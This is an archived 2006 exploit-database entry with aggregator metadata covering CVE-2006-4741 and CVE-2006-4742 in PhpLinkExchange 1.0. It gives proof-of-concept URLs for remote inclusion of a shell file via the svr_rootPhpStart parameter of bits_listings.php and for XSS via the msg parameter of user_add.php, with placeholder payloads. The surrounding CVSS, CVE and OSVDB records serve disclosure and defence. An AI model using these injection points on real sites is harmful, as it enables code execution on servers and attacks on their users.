ID EDB-ID:2347
Type exploitdb
Reporter s3rv3r_hack3r
Modified 2006-09-11T00:00:00
Description
PhpLinkExchange 1.0 remote file inclusion and cross-site scripting (XSS) vulnerabilities: CVE-2006-4741 (file inclusion) and CVE-2006-4742 (XSS). Webapps exploit for the PHP platform.
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Remote file inclusion (CVE-2006-4741), via the svr_rootPhpStart parameter of bits_listings.php:
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
Cross-site scripting (CVE-2006-4742), via the msg parameter of user_add.php:
http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]
# milw0rm.com [2006-09-11]
{"id": "EDB-ID:2347", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PhpLinkExchange 1.0 include/XSS Remote Vulnerabilities", "description": "PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities. CVE-2006-4741,CVE-2006-4742. Webapps exploit for php platform", "published": "2006-09-11T00:00:00", "modified": "2006-09-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2347/", "reporter": "s3rv3r_hack3r", "references": [], "cvelist": ["CVE-2006-4741", "CVE-2006-4742"], "lastseen": "2016-01-31T16:03:46", "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T16:03:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4741", "CVE-2006-4742"]}, {"type": "osvdb", "idList": ["OSVDB:32156", "OSVDB:32157"]}], "modified": "2016-01-31T16:03:46", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/2347/", "sourceData": "vendor :www.idevspot.com\n\nDemo : www.idevspot.com/demo/PhpStart/PhpLinkExchange\n\nBy : s3rv3r_hack3r\n\nwww: hackerz.ir & h4ckerz.com\n\nremote file include :\n\nhttp://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]\n\nxss:\n\nhttp://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]\n\n# milw0rm.com [2006-09-11]\n", "osvdbidlist": ["32157", "32156"]}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Cross-site scripting (XSS) vulnerability in user_add.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-13T22:07:00", "title": "CVE-2006-4742", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4742"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:idevspot:phplinkexchange:1.0"], "id": "CVE-2006-4742", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4742", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:idevspot:phplinkexchange:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:24", "description": "PHP remote file inclusion vulnerability in bits_listings.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to execute arbitrary code via the svr_rootPhpStart parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-13T22:07:00", "title": "CVE-2006-4741", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4741"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:idevspot:phplinkexchange:1.0"], "id": "CVE-2006-4741", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:idevspot:phplinkexchange:1.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4742"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32156](https://vulners.com/osvdb/OSVDB:32156)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0162.html\n[CVE-2006-4742](https://vulners.com/cve/CVE-2006-4742)\nBugtraq ID: 19931\n", "edition": 1, "modified": "2006-09-09T18:59:34", "published": "2006-09-09T18:59:34", "href": "https://vulners.com/osvdb/OSVDB:32157", "id": "OSVDB:32157", "title": "PhpLinkExchange user_add.php msg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4741"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32157](https://vulners.com/osvdb/OSVDB:32157)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0162.html\n[CVE-2006-4741](https://vulners.com/cve/CVE-2006-4741)\n", "edition": 1, "modified": "2006-09-09T18:59:34", "published": "2006-09-09T18:59:34", "href": "https://vulners.com/osvdb/OSVDB:32156", "id": "OSVDB:32156", "title": "PhpLinkExchange bits_listings.php svr_rootPhpStart Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}